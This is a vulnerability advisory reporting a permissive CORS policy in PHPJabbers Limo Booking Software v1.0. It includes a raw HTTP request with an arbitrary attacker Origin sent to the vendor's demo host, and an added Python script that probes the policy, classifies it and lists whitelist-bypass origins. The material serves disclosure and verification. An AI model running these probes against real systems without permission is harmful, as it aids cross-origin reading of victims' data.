Limo Booking Software v1.0 - CORS

EDB-ID:

51744

CVE:

N/A




Platform:

PHP

Date:

2023-10-09


## Title: Limo Booking Software v1.0 - CORS 
## Author: nu11secur1ty
## Date: 09/08/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cors

## Description:
The application sets a cross-origin resource sharing (CORS) policy on this request that allows access from any domain: the arbitrary origin http://wioydcbiourl.com sent in the request was accepted by the server, so a page on an attacker-controlled site can read the response cross-origin. Because the response carries no Vary: Origin header, reverse proxies and other intermediate caches may store it and serve the permissive response to other clients, which enables cache poisoning. The result is that an attacker can retrieve some of the application's resources through the victim's browser without the victim noticing. How much this exposes depends on whether the response also allows credentials (Access-Control-Allow-Credentials: true): without that header a browser sends no cookies, and only content an anonymous client could already fetch is readable.

STATUS: HIGH Vulnerability

[+]Test Payload:
```
GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795 HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://wioydcbiourl.com
Referer: http://demo.phpjabbers.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0

```
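To verify a finding like this one and judge its real impact, the following added example (not part of the advisory and not the vendor's code) sends a request with an attacker-controlled Origin, the same one used in the test payload above, and classifies the CORS headers in the reply: reflected origin, wildcard, credentials allowed, and whether Vary: Origin is present. It also lists the origins worth trying against an origin whitelist, which goes beyond the single arbitrary origin in the payload. The sample responses at the bottom are constructed, not captured from demo.phpjabbers.com, and the function and variable names are this example's own.

```python
"""Probe and classify a CORS policy (added example; not the advisory's or vendor's code)."""
import http.client
from dataclasses import dataclass, field
from typing import Dict, List

# Arbitrary attacker origin, the same one used in the advisory's test payload.
ATTACKER_ORIGIN = "http://wioydcbiourl.com"


@dataclass
class CorsVerdict:
    reflects_origin: bool = False   # ACAO echoes the attacker-chosen Origin
    wildcard: bool = False          # ACAO is "*"
    credentials: bool = False       # Access-Control-Allow-Credentials: true
    vary_origin: bool = False       # Vary header lists Origin
    findings: List[str] = field(default_factory=list)


def classify_cors(request_origin: str, headers: Dict[str, str]) -> CorsVerdict:
    """Classify one response's CORS headers for the Origin that was sent.

    Header names are matched case-insensitively, as a browser would.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    v = CorsVerdict()
    v.credentials = h.get("access-control-allow-credentials", "").lower() == "true"
    v.vary_origin = "origin" in [t.strip().lower() for t in h.get("vary", "").split(",")]
    acao = h.get("access-control-allow-origin")

    if acao is None:
        v.findings.append("INFO: no Access-Control-Allow-Origin; browsers block cross-origin reads")
    elif acao == "*":
        v.wildcard = True
        v.findings.append("LOW: wildcard origin; browsers never send credentials with '*', "
                          "so only content an anonymous client could fetch is exposed")
    elif acao == request_origin:
        v.reflects_origin = True
        v.findings.append(f"arbitrary origin reflected: {request_origin}")
        if v.credentials:
            v.findings.append("HIGH: credentials allowed with a reflected origin; an attacker "
                              "page can read the victim's authenticated responses")
        else:
            v.findings.append("LOW: no credentials; only content an anonymous client could fetch is exposed")
        if not v.vary_origin:
            v.findings.append("Vary: Origin missing; a cache may serve this reflected ACAO "
                              "to other clients (cache poisoning)")
    else:
        v.findings.append(f"INFO: ACAO is fixed to {acao}; attacker origin not allowed")
    return v


def probe_origins(target_host: str) -> List[str]:
    """Origins worth sending against a whitelist: arbitrary, null, and weak-match bypasses."""
    return [
        ATTACKER_ORIGIN,
        "null",                                    # sandboxed iframes and data: URLs send Origin: null
        f"http://{target_host}.wioydcbiourl.com",  # defeats startswith(target) checks
        f"http://evil{target_host}",               # defeats endswith(target) checks
    ]


def probe_cors(host: str, path: str, origin: str = ATTACKER_ORIGIN, https: bool = False) -> CorsVerdict:
    """Send one GET with an attacker-controlled Origin and classify the reply (needs network)."""
    cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
    conn = cls(host, timeout=10)
    try:
        conn.request("GET", path, headers={"Origin": origin, "User-Agent": "cors-check/1.0"})
        resp = conn.getresponse()
        resp.read()  # drain the body; only the headers matter here
        return classify_cors(origin, dict(resp.getheaders()))
    finally:
        conn.close()


# Constructed sample responses (not captured from demo.phpjabbers.com) covering each verdict.
SAMPLE_REFLECTED_NO_VARY = {
    "Content-Type": "text/html; charset=utf-8",
    "Access-Control-Allow-Origin": "http://wioydcbiourl.com",
}
SAMPLE_REFLECTED_CREDENTIALS = {
    "Access-Control-Allow-Origin": "http://wioydcbiourl.com",
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Accept-Encoding, Origin",
}
SAMPLE_NO_CORS = {"Content-Type": "text/html; charset=utf-8"}

if __name__ == "__main__":
    for name, hdrs in [("reflected, no Vary", SAMPLE_REFLECTED_NO_VARY),
                       ("reflected + credentials", SAMPLE_REFLECTED_CREDENTIALS),
                       ("no CORS headers", SAMPLE_NO_CORS)]:
        print(name, "->", classify_cors(ATTACKER_ORIGIN, hdrs).findings)
    # Live check of the endpoint from the advisory (uncomment to run against the demo host):
    # path = "/1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795"
    # print(probe_cors("demo.phpjabbers.com", path).findings)
```

Run it as-is to see the three constructed verdicts; to reproduce against the demo, uncomment the last two lines and repeat probe_cors for each origin from probe_origins("demo.phpjabbers.com"). The reflected-origin case is only rated HIGH when Access-Control-Allow-Credentials is also true, which is the check to make before reusing the severity in the advisory.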

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)

## Time spent:
00:35:00